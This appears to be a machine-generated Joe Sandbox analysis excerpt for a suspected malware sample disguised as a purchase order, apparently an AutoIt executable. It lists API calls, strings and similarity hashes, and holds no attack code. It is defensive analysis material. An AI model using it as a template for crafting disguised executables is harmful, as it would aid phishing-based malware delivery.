                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                    • String ID: @$AutoIt v3 GUI
                                                    • API String ID: 867697134-3359773793
                                                    • Opcode ID: f09f2a2b6cca380f9ede19f0122a88a3538efa9583e86f2b72b74e79f194809b
                                                    • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                    • Opcode Fuzzy Hash: f09f2a2b6cca380f9ede19f0122a88a3538efa9583e86f2b72b74e79f194809b
                                                    • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                    • API String ID: 1503153545-1459072770
                                                    • Opcode ID: 25176badb4c7c2acafbada8736ce4727ecc29bf237f3baecdcf6ce07152c7a72
                                                    • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                    • Opcode Fuzzy Hash: 25176badb4c7c2acafbada8736ce4727ecc29bf237f3baecdcf6ce07152c7a72
                                                    • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll$__wcsnicmp
                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                    • API String ID: 790654849-32604322
                                                    • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                    • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                    • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                    • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 51d54aaaf05eeae720ac6d1e318f43104c3f26f36b893052ab7eca2f1f05da39
                                                    • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                    • Opcode Fuzzy Hash: 51d54aaaf05eeae720ac6d1e318f43104c3f26f36b893052ab7eca2f1f05da39
                                                    • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                    APIs
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Window
                                                    • String ID: 0
                                                    • API String ID: 2353593579-4108050209
                                                    • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                    • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                    • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                    • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                    APIs
                                                    • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                    • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                    • GetWindowDC.USER32(?), ref: 0044A0F6
                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                    • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                    • GetSysColor.USER32(0000000F), ref: 0044A131
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                    • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                    • GetSysColor.USER32(00000005), ref: 0044A15B
                                                    • GetWindowDC.USER32(?), ref: 0044A1BE
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                    • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                    • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                    • GetSysColor.USER32(00000008), ref: 0044A265
                                                    • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                    • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                    • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                    • String ID:
                                                    • API String ID: 1744303182-0
                                                    • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                    • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                    • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                    • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                    • __mtterm.LIBCMT ref: 00417C34
                                                      • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                      • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                      • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                      • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                    • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                    • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                    • __init_pointers.LIBCMT ref: 00417CE6
                                                    • __calloc_crt.LIBCMT ref: 00417D54
                                                    • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                    • API String ID: 4163708885-3819984048
                                                    • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                    • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                    • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                    • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll$IconLoad
                                                    • String ID: blank$info$question$stop$warning
                                                    • API String ID: 2485277191-404129466
                                                    • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                    • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                    • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                    • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                    APIs
                                                    • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                    • SetWindowTextW.USER32(?,?), ref: 00454678
                                                    • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                    • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                    • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                    • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                    • GetWindowRect.USER32(?,?), ref: 004546F5
                                                    • SetWindowTextW.USER32(?,?), ref: 00454765
                                                    • GetDesktopWindow.USER32 ref: 0045476F
                                                    • GetWindowRect.USER32(00000000), ref: 00454776
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                    • GetClientRect.USER32(?,?), ref: 004547D2
                                                    • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                    • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                    • String ID:
                                                    • API String ID: 3869813825-0
                                                    • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                    • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                    • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                    • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00464B28
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                    • _wcslen.LIBCMT ref: 00464C28
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                    • _wcslen.LIBCMT ref: 00464CBA
                                                    • _wcslen.LIBCMT ref: 00464CD0
                                                    • _wcslen.LIBCMT ref: 00464CEF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$Directory$CurrentSystem
                                                    • String ID: D
                                                    • API String ID: 1914653954-2746444292
                                                    • Opcode ID: e582c214e498576940320affdbb39b983f19030349f56f9343014e7b8f55c96d
                                                    • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                    • Opcode Fuzzy Hash: e582c214e498576940320affdbb39b983f19030349f56f9343014e7b8f55c96d
                                                    • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll
                                                    • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                    • API String ID: 3832890014-4202584635
                                                    • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                    • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                    • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                    • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                    APIs
                                                    • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                    • GetFocus.USER32 ref: 0046A0DD
                                                    • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$CtrlFocus
                                                    • String ID: 0
                                                    • API String ID: 1534620443-4108050209
                                                    • Opcode ID: 44486a5aeb11d59bb0643a5d37d795f452b8c762e0e59614718db8fb8d240587
                                                    • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                    • Opcode Fuzzy Hash: 44486a5aeb11d59bb0643a5d37d795f452b8c762e0e59614718db8fb8d240587
                                                    • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                    APIs
                                                    • DestroyWindow.USER32(?), ref: 004558E3
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateDestroy
                                                    • String ID: ,$tooltips_class32
                                                    • API String ID: 1109047481-3856767331
                                                    • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                    • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                    • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                    • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                    • GetMenuItemCount.USER32(?), ref: 00468C45
                                                    • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                    • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                    • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                    • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                    • GetMenuItemCount.USER32 ref: 00468CFD
                                                    • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                    • GetCursorPos.USER32(?), ref: 00468D3F
                                                    • SetForegroundWindow.USER32(?), ref: 00468D49
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                    • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                    • String ID: 0
                                                    • API String ID: 1441871840-4108050209
